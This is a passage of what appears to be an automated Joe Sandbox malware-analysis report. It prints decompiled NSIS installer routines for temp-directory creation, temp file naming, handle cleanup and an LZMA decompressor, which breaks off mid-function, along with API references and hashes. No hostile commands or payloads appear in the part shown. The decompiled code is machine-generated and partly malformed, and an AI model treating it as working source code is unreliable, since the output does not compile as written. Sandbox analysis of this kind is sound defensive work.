				_v36.Control = 4;
				_v36.Dacl = 0x4083e8;
				_v16.nLength = 0xc;
				_t22 = CreateDirectoryW(_a4,  &_v16); // executed
				if(_t22 != 0) {
					L1:
					return 0;
				}
				_t23 = GetLastError();
				if(_t23 == 0xb7) {
					if(SetFileSecurityW(_a4, 0x80000007,  &_v36) != 0) {
						goto L1;
					}
					return GetLastError();
				}
				return _t23;
			}

0x00405ba4
0x00405ba8
0x00405bab
0x00405bb1
0x00405bb5
0x00405bb9
0x00405bc1
0x00405bc8
0x00405bce
0x00405bd5
0x00405bdc
0x00405be4
0x00405be6
0x00000000
0x00405be6
0x00405bf0
0x00405bf7
0x00405c0d
0x00000000
0x00000000
0x00000000
0x00405c0f
0x00405c13

APIs

CreateDirectoryW.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 00405BDC
GetLastError.KERNEL32 ref: 00405BF0
SetFileSecurityW.ADVAPI32(?,80000007,00000001), ref: 00405C05
GetLastError.KERNEL32 ref: 00405C0F

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 00405BBF

Memory Dump Source

Source File: 00000000.00000002.292638866.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.292633849.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.292664060.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.292695326.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.292705832.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.292767334.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.292786938.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.292798492.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.292806668.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.292812000.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_xeWd55M5Lb.jbxd

Similarity

API ID: ErrorLast$CreateDirectoryFileSecurity
String ID: C:\Users\user\AppData\Local\Temp\
API String ID: 3449924974-3916508600
Opcode ID: 4d8c721838b8a92ea27708fe49d100345a2f80ebd1be40878b53e15a1b169c58
Instruction ID: 886f74eda6482ab63e8fe18d08a652fea41827dc0a526659a7d7b5e138c44e4e
Opcode Fuzzy Hash: 4d8c721838b8a92ea27708fe49d100345a2f80ebd1be40878b53e15a1b169c58
Instruction Fuzzy Hash: 95010871D04219EAEF009FA1CD44BEFBBB8EF14314F04403ADA44B6180E7789648CB99

Uniqueness

Uniqueness Score: -1.00%

Function 00406187 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 37
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E00406187(void* __ecx, WCHAR* _a4, WCHAR* _a8) {
				intOrPtr _v8;
				short _v12;
				short _t12;
				intOrPtr _t13;
				signed int _t14;
				WCHAR* _t17;
				signed int _t19;
				signed short _t23;
				WCHAR* _t26;

				_t26 = _a4;
				_t23 = 0x64;
				while(1) {
					_t12 =  *L"nsa"; // 0x73006e
					_t23 = _t23 - 1;
					_v12 = _t12;
					_t13 =  *0x40a5ac; // 0x61
					_v8 = _t13;
					_t14 = GetTickCount();
					_t19 = 0x1a;
					_v8 = _v8 + _t14 % _t19;
					_t17 = GetTempFileNameW(_a8,  &_v12, 0, _t26); // executed
					if(_t17 != 0) {
						break;
					}
					if(_t23 != 0) {
						continue;
					} else {
						 *_t26 =  *_t26 & _t23;
					}
					L4:
					return _t17;
				}
				_t17 = _t26;
				goto L4;
			}

0x0040618d
0x00406193
0x00406194
0x00406194
0x00406199
0x0040619a
0x0040619d
0x004061a2
0x004061a5
0x004061af
0x004061bc
0x004061c0
0x004061c8
0x00000000
0x00000000
0x004061cc
0x00000000
0x004061ce
0x004061ce
0x004061ce
0x004061d1
0x004061d4
0x004061d4
0x004061d7
0x00000000

APIs

GetTickCount.KERNEL32 ref: 004061A5
GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,?,0040363E,1033,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403923), ref: 004061C0

Strings

nsa, xrefs: 00406194
C:\Users\user\AppData\Local\Temp\, xrefs: 0040618C

Memory Dump Source

Source File: 00000000.00000002.292638866.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.292633849.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.292664060.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.292695326.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.292705832.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.292767334.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.292786938.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.292798492.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.292806668.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.292812000.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_xeWd55M5Lb.jbxd

Similarity

API ID: CountFileNameTempTick
String ID: C:\Users\user\AppData\Local\Temp\$nsa
API String ID: 1716503409-1968954121
Opcode ID: 6315ab6e6f8253ba2c88c9b6803a176270f8621abb800126aa0f3c3b7b9ef66c
Instruction ID: 21b676f9b33da427d45e0b2d6905a63b6509bf3d89a4e990effff8b21c6fdcbe
Opcode Fuzzy Hash: 6315ab6e6f8253ba2c88c9b6803a176270f8621abb800126aa0f3c3b7b9ef66c
Instruction Fuzzy Hash: C3F09076700214BFEB008F59DD05E9AB7BCEBA1710F11803AEE05EB180E6B0A9648768

Uniqueness

Uniqueness Score: -1.00%

Function 00403C25 Relevance: 6.0, APIs: 2, Strings: 2, Instructions: 20
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E00403C25() {
				void* _t1;
				void* _t2;
				void* _t4;
				signed int _t11;

				_t1 =  *0x40a018; // 0xffffffff
				if(_t1 != 0xffffffff) {
					CloseHandle(_t1);
					 *0x40a018 =  *0x40a018 | 0xffffffff;
				}
				_t2 =  *0x40a01c; // 0xffffffff
				if(_t2 != 0xffffffff) {
					CloseHandle(_t2);
					 *0x40a01c =  *0x40a01c | 0xffffffff;
					_t11 =  *0x40a01c;
				}
				E00403C82();
				_t4 = E00405D74(_t11, L"C:\\Users\\hardz\\AppData\\Local\\Temp\\nsa497E.tmp\\", 7); // executed
				return _t4;
			}

0x00403c25
0x00403c34
0x00403c37
0x00403c39
0x00403c39
0x00403c40
0x00403c48
0x00403c4b
0x00403c4d
0x00403c4d
0x00403c4d
0x00403c54
0x00403c60
0x00403c66

APIs

CloseHandle.KERNEL32(FFFFFFFF,C:\Users\user\AppData\Local\Temp\,00403B71,?), ref: 00403C37
CloseHandle.KERNEL32(FFFFFFFF,C:\Users\user\AppData\Local\Temp\,00403B71,?), ref: 00403C4B

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 00403C2A
C:\Users\user\AppData\Local\Temp\nsa497E.tmp\, xrefs: 00403C5B

Memory Dump Source

Source File: 00000000.00000002.292638866.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.292633849.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.292664060.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.292695326.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.292705832.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.292767334.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.292786938.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.292798492.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.292806668.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.292812000.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_xeWd55M5Lb.jbxd

Similarity

API ID: CloseHandle
String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\nsa497E.tmp\
API String ID: 2962429428-3428511127
Opcode ID: 3450910aa3eb4a83e9339ad550daa728f038e8843dee50fd20da138f79135bda
Instruction ID: ab9e488bef71b432d29da19662b82269d7b8f1628316f3e3d8f7e3aa77a32ace
Opcode Fuzzy Hash: 3450910aa3eb4a83e9339ad550daa728f038e8843dee50fd20da138f79135bda
Instruction Fuzzy Hash: 3BE0863244471496E5246F7DAF4D9853B285F413357248726F178F60F0C7389A9B4A9D

Uniqueness

Uniqueness Score: -1.00%

Function 0040603F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 47
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 53%

			E0040603F(void* __eflags, intOrPtr _a4) {
				int _t11;
				signed char* _t12;
				long _t16;
				intOrPtr _t18;
				intOrPtr* _t21;
				signed int _t23;

				E00406668(0x425f50, _a4);
				_t21 = E00405FE2(0x425f50);
				if(_t21 != 0) {
					E004068EF(_t21);
					if(( *0x42a278 & 0x00000080) == 0) {
						L5:
						_t23 = _t21 - 0x425f50 >> 1;
						while(1) {
							_t11 = lstrlenW(0x425f50);
							_push(0x425f50);
							if(_t11 <= _t23) {
								break;
							}
							_t12 = E0040699E();
							if(_t12 == 0 || ( *_t12 & 0x00000010) != 0) {
								E00405F83(0x425f50);
								continue;
							} else {
								goto L1;
							}
						}
						E00405F37();
						_t16 = GetFileAttributesW(??); // executed
						return 0 | _t16 != 0xffffffff;
					}
					_t18 =  *_t21;
					if(_t18 == 0 || _t18 == 0x5c) {
						goto L1;
					} else {
						goto L5;
					}
				}
				L1:
				return 0;
			}

0x0040604b
0x00406056
0x0040605a
0x00406061
0x0040606d
0x0040607d
0x0040607f
0x00406097
0x00406098
0x0040609f
0x004060a0
0x00000000
0x00000000
0x00406083
0x0040608a
0x00406092
0x00000000
0x00000000
0x00000000
0x00000000
0x0040608a
0x004060a2
0x004060a8
0x00000000
0x004060b6
0x0040606f
0x00406075
0x00000000
0x00000000
0x00000000
0x00000000
0x00406075
0x0040605c
0x00000000

APIs

Part of subcall function 00406668: lstrcpynW.KERNEL32(?,?,00000400,004037B0,00429260,NSIS Error), ref: 00406675

Part of subcall function 00405FE2: CharNextW.USER32(?,?,00425F50,?,00406056,00425F50,00425F50,7620FAA0,?,7620F560,00405D94,?,7620FAA0,7620F560,00000000), ref: 00405FF0
Part of subcall function 00405FE2: CharNextW.USER32(00000000), ref: 00405FF5
Part of subcall function 00405FE2: CharNextW.USER32(00000000), ref: 0040600D

lstrlenW.KERNEL32(00425F50,00000000,00425F50,00425F50,7620FAA0,?,7620F560,00405D94,?,7620FAA0,7620F560,00000000), ref: 00406098
GetFileAttributesW.KERNELBASE(00425F50,00425F50,00425F50,00425F50,00425F50,00425F50,00000000,00425F50,00425F50,7620FAA0,?,7620F560,00405D94,?,7620FAA0,7620F560), ref: 004060A8

Strings

P_B, xrefs: 00406045

Memory Dump Source

Source File: 00000000.00000002.292638866.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.292633849.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.292664060.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.292695326.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.292705832.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.292767334.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.292786938.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.292798492.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.292806668.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.292812000.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_xeWd55M5Lb.jbxd

Similarity

API ID: CharNext$AttributesFilelstrcpynlstrlen
String ID: P_B
API String ID: 3248276644-906794629
Opcode ID: 900e3a3aedd828ccf636743a116f58552bc6887dcb5d3e9637a901da882d1290
Instruction ID: df110f430b83b9381375b5fd3fa67f6c4419d4890c6468873e0fced3c2676832
Opcode Fuzzy Hash: 900e3a3aedd828ccf636743a116f58552bc6887dcb5d3e9637a901da882d1290
Instruction Fuzzy Hash: 0DF07826144A1216E622B23A0C05BAF05098F82354B07063FFC93B22E1DF3C8973C43E

Uniqueness

Uniqueness Score: -1.00%

Function 00407194 Relevance: 5.2, APIs: 4, Instructions: 236
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 99%

			E00407194() {
				signed int _t530;
				void _t537;
				signed int _t538;
				signed int _t539;
				unsigned short _t569;
				signed int _t579;
				signed int _t607;
				void* _t627;
				signed int _t628;
				signed int _t635;
				signed int* _t643;
				void* _t644;

				L0:
				while(1) {
					L0:
					_t530 =  *(_t644 - 0x30);
					if(_t530 >= 4) {
					}
					 *(_t644 - 0x40) = 6;
					 *(_t644 - 0x7c) = 0x19;
					 *((intOrPtr*)(_t644 - 0x58)) = (_t530 << 7) +  *(_t644 - 4) + 0x360;
					while(1) {
						L145:
						 *(_t644 - 0x50) = 1;
						 *(_t644 - 0x48) =  *(_t644 - 0x40);
						while(1) {
							L149:
							if( *(_t644 - 0x48) <= 0) {
								goto L155;
							}
							L150:
							_t627 =  *(_t644 - 0x50) +  *(_t644 - 0x50);
							_t643 = _t627 +  *((intOrPtr*)(_t644 - 0x58));
							 *(_t644 - 0x54) = _t643;
							_t569 =  *_t643;
							_t635 = _t569 & 0x0000ffff;
							_t607 = ( *(_t644 - 0x10) >> 0xb) * _t635;
							if( *(_t644 - 0xc) >= _t607) {
								 *(_t644 - 0x10) =  *(_t644 - 0x10) - _t607;
								 *(_t644 - 0xc) =  *(_t644 - 0xc) - _t607;
								_t628 = _t627 + 1;
								 *_t643 = _t569 - (_t569 >> 5);
								 *(_t644 - 0x50) = _t628;
							} else {
								 *(_t644 - 0x10) = _t607;
								 *(_t644 - 0x50) =  *(_t644 - 0x50) << 1;
								 *_t643 = (0x800 - _t635 >> 5) + _t569;
							}
							if( *(_t644 - 0x10) >= 0x1000000) {
								L148:
								_t487 = _t644 - 0x48;
								 *_t487 =  *(_t644 - 0x48) - 1;
								L149:
								if( *(_t644 - 0x48) <= 0) {
									goto L155;
								}
								goto L150;
							} else {
								L154:
								L146:
								if( *(_t644 - 0x6c) == 0) {
									L169:
									 *(_t644 - 0x88) = 0x18;
									L170:
									_t579 = 0x22;
									memcpy( *(_t644 - 0x90), _t644 - 0x88, _t579 << 2);
									_t539 = 0;
									L172:
									return _t539;
								}
								L147:
								 *(_t644 - 0x10) =  *(_t644 - 0x10) << 8;
								 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
								_t484 = _t644 - 0x70;
								 *_t484 =  &(( *(_t644 - 0x70))[1]);
								 *(_t644 - 0xc) =  *(_t644 - 0xc) << 0x00000008 |  *( *(_t644 - 0x70)) & 0x000000ff;
								goto L148;
							}
							L155:
							_t537 =  *(_t644 - 0x7c);
							 *((intOrPtr*)(_t644 - 0x44)) =  *(_t644 - 0x50) - (1 <<  *(_t644 - 0x40));
							while(1) {
								L140:
								 *(_t644 - 0x88) = _t537;
								while(1) {
									L1:
									_t538 =  *(_t644 - 0x88);
									if(_t538 > 0x1c) {
										break;
									}
									L2:
									switch( *((intOrPtr*)(_t538 * 4 +  &M00407602))) {
										case 0:
											L3:
											if( *(_t644 - 0x6c) == 0) {
												goto L170;
											}
											L4:
											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
											 *(_t644 - 0x70) =  &(( *(_t644 - 0x70))[1]);
											_t538 =  *( *(_t644 - 0x70));
											if(_t538 > 0xe1) {
												goto L171;
											}
											L5:
											_t542 = _t538 & 0x000000ff;
											_push(0x2d);
											asm("cdq");
											_pop(_t581);
											_push(9);
											_pop(_t582);
											_t638 = _t542 / _t581;
											_t544 = _t542 % _t581 & 0x000000ff;
											asm("cdq");
											_t633 = _t544 % _t582 & 0x000000ff;
											 *(_t644 - 0x3c) = _t633;
											 *(_t644 - 0x1c) = (1 << _t638) - 1;
											 *((intOrPtr*)(_t644 - 0x18)) = (1 << _t544 / _t582) - 1;
											_t641 = (0x300 << _t633 + _t638) + 0x736;
											if(0x600 ==  *((intOrPtr*)(_t644 - 0x78))) {
												L10:
												if(_t641 == 0) {
													L12:
													 *(_t644 - 0x48) =  *(_t644 - 0x48) & 0x00000000;
													 *(_t644 - 0x40) =  *(_t644 - 0x40) & 0x00000000;
													goto L15;
												} else {
													goto L11;
												}
												do {
													L11:
													_t641 = _t641 - 1;
													 *((short*)( *(_t644 - 4) + _t641 * 2)) = 0x400;
												} while (_t641 != 0);
												goto L12;
											}
											L6:
											if( *(_t644 - 4) != 0) {
												GlobalFree( *(_t644 - 4));
											}
											_t538 = GlobalAlloc(0x40, 0x600); // executed
											 *(_t644 - 4) = _t538;
											if(_t538 == 0) {
												goto L171;
											} else {
												 *((intOrPtr*)(_t644 - 0x78)) = 0x600;
												goto L10;
											}
										case 1:
											L13:
											__eflags =  *(_t644 - 0x6c);
											if( *(_t644 - 0x6c) == 0) {
												L157:
												 *(_t644 - 0x88) = 1;
												goto L170;
											}
											L14:
											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
											 *(_t644 - 0x40) =  *(_t644 - 0x40) | ( *( *(_t644 - 0x70)) & 0x000000ff) <<  *(_t644 - 0x48) << 0x00000003;
											 *(_t644 - 0x70) =  &(( *(_t644 - 0x70))[1]);
											_t45 = _t644 - 0x48;
											 *_t45 =  *(_t644 - 0x48) + 1;
											__eflags =  *_t45;
											L15:
											if( *(_t644 - 0x48) < 4) {
												goto L13;
											}
											L16:
											_t550 =  *(_t644 - 0x40);
											if(_t550 ==  *(_t644 - 0x74)) {
												L20:
												 *(_t644 - 0x48) = 5;
												 *( *(_t644 - 8) +  *(_t644 - 0x74) - 1) =  *( *(_t644 - 8) +  *(_t644 - 0x74) - 1) & 0x00000000;
												goto L23;
											}
											L17:
											 *(_t644 - 0x74) = _t550;
											if( *(_t644 - 8) != 0) {
												GlobalFree( *(_t644 - 8));
											}
											_t538 = GlobalAlloc(0x40,  *(_t644 - 0x40)); // executed
											 *(_t644 - 8) = _t538;
											if(_t538 == 0) {
												goto L171;
											} else {
												goto L20;
											}
										case 2:
											L24:
											_t557 =  *(_t644 - 0x60) &  *(_t644 - 0x1c);
											 *(_t644 - 0x84) = 6;
											 *(_t644 - 0x4c) = _t557;
											_t642 =  *(_t644 - 4) + (( *(_t644 - 0x38) << 4) + _t557) * 2;
											goto L132;
										case 3:
											L21:
											__eflags =  *(_t644 - 0x6c);
											if( *(_t644 - 0x6c) == 0) {
												L158:
												 *(_t644 - 0x88) = 3;
												goto L170;
											}
											L22:
											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
											_t67 = _t644 - 0x70;
											 *_t67 =  &(( *(_t644 - 0x70))[1]);
											__eflags =  *_t67;
											 *(_t644 - 0xc) =  *(_t644 - 0xc) << 0x00000008 |  *( *(_t644 - 0x70)) & 0x000000ff;
											L23:
											 *(_t644 - 0x48) =  *(_t644 - 0x48) - 1;
											if( *(_t644 - 0x48) != 0) {
												goto L21;
											}
											goto L24;
										case 4:
											L133:
											_t559 =  *_t642;
											_t626 = _t559 & 0x0000ffff;
											_t596 = ( *(_t644 - 0x10) >> 0xb) * _t626;
											if( *(_t644 - 0xc) >= _t596) {
												 *(_t644 - 0x10) =  *(_t644 - 0x10) - _t596;
												 *(_t644 - 0xc) =  *(_t644 - 0xc) - _t596;
												 *(_t644 - 0x40) = 1;
												_t560 = _t559 - (_t559 >> 5);
												__eflags = _t560;
												 *_t642 = _t560;
											} else {
												 *(_t644 - 0x10) = _t596;
												 *(_t644 - 0x40) =  *(_t644 - 0x40) & 0x00000000;
												 *_t642 = (0x800 - _t626 >> 5) + _t559;
											}
											if( *(_t644 - 0x10) >= 0x1000000) {
												goto L139;
											} else {
												goto L137;
											}
										case 5:
											L137:
											if( *(_t644 - 0x6c) == 0) {
												L168:
												 *(_t644 - 0x88) = 5;
												goto L170;
											}
											L138:
											 *(_t644 - 0x10) =  *(_t644 - 0x10) << 8;
											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
											 *(_t644 - 0x70) =  &(( *(_t644 - 0x70))[1]);
											 *(_t644 - 0xc) =  *(_t644 - 0xc) << 0x00000008 |  *( *(_t644 - 0x70)) & 0x000000ff;
											L139:
											_t537 =  *(_t644 - 0x84);
											L140:
											 *(_t644 - 0x88) = _t537;
											goto L1;
										case 6:
											L25:
											__edx = 0;
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												L36:
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x34) = 1;
												 *(__ebp - 0x84) = 7;
												__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
												goto L132;
											}
											L26:
											__eax =  *(__ebp - 0x5c) & 0x000000ff;
											__esi =  *(__ebp - 0x60);
											__cl = 8;
											__cl = 8 -  *(__ebp - 0x3c);
											__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
											__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
											__ecx =  *(__ebp - 0x3c);
											__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
											__ecx =  *(__ebp - 4);
											(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
											__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
											__eflags =  *(__ebp - 0x38) - 4;
											__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											if( *(__ebp - 0x38) >= 4) {
												__eflags =  *(__ebp - 0x38) - 0xa;
												if( *(__ebp - 0x38) >= 0xa) {
													_t98 = __ebp - 0x38;
													 *_t98 =  *(__ebp - 0x38) - 6;
													__eflags =  *_t98;
												} else {
													 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
												}
											} else {
												 *(__ebp - 0x38) = 0;
											}
											__eflags =  *(__ebp - 0x34) - __edx;
											if( *(__ebp - 0x34) == __edx) {
												L35:
												__ebx = 0;
												__ebx = 1;
												goto L61;
											} else {
												L32:
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__ecx =  *(__ebp - 8);
												__ebx = 0;
												__ebx = 1;
												__al =  *((intOrPtr*)(__eax + __ecx));
												 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
												goto L41;
											}
										case 7:
											L66:
											__eflags =  *(__ebp - 0x40) - 1;
											if( *(__ebp - 0x40) != 1) {
												L68:
												__eax =  *(__ebp - 0x24);
												 *(__ebp - 0x80) = 0x16;
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x28);
												 *(__ebp - 0x24) =  *(__ebp - 0x28);
												__eax =  *(__ebp - 0x2c);
												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
												__al = __al & 0x000000fd;
												__eax = (__eflags >= 0) - 1 + 0xa;
												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
												__eax =  *(__ebp - 4);
												__eax =  *(__ebp - 4) + 0x664;
												__eflags = __eax;
												 *(__ebp - 0x58) = __eax;
												goto L69;
											}
											L67:
											__eax =  *(__ebp - 4);
											__ecx =  *(__ebp - 0x38);
											 *(__ebp - 0x84) = 8;
											__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
											goto L132;
										case 8:
											L70:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 0xa;
												__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
											} else {
												__eax =  *(__ebp - 0x38);
												__ecx =  *(__ebp - 4);
												__eax =  *(__ebp - 0x38) + 0xf;
												 *(__ebp - 0x84) = 9;
												 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
												__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
											}
											goto L132;
										case 9:
											L73:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												goto L90;
											}
											L74:
											__eflags =  *(__ebp - 0x60);
											if( *(__ebp - 0x60) == 0) {
												goto L171;
											}
											L75:
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											_t259 =  *(__ebp - 0x38) - 7 >= 0;
											__eflags = _t259;
											0 | _t259 = _t259 + _t259 + 9;
											 *(__ebp - 0x38) = _t259 + _t259 + 9;
											goto L76;
										case 0xa:
											L82:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												L84:
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 0xb;
												__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
												goto L132;
											}
											L83:
											__eax =  *(__ebp - 0x28);
											goto L89;
										case 0xb:
											L85:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__ecx =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x20);
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
											} else {
												__eax =  *(__ebp - 0x24);
											}
											__ecx =  *(__ebp - 0x28);
											 *(__ebp - 0x24) =  *(__ebp - 0x28);
											L89:
											__ecx =  *(__ebp - 0x2c);
											 *(__ebp - 0x2c) = __eax;
											 *(__ebp - 0x28) =  *(__ebp - 0x2c);
											L90:
											__eax =  *(__ebp - 4);
											 *(__ebp - 0x80) = 0x15;
											__eax =  *(__ebp - 4) + 0xa68;
											 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
											goto L69;
										case 0xc:
											L99:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												L164:
												 *(__ebp - 0x88) = 0xc;
												goto L170;
											}
											L100:
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t334 = __ebp - 0x70;
											 *_t334 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t334;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											__eax =  *(__ebp - 0x2c);
											goto L101;
										case 0xd:
											L37:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												L159:
												 *(__ebp - 0x88) = 0xd;
												goto L170;
											}
											L38:
											__ecx =  *(__ebp - 0x70);
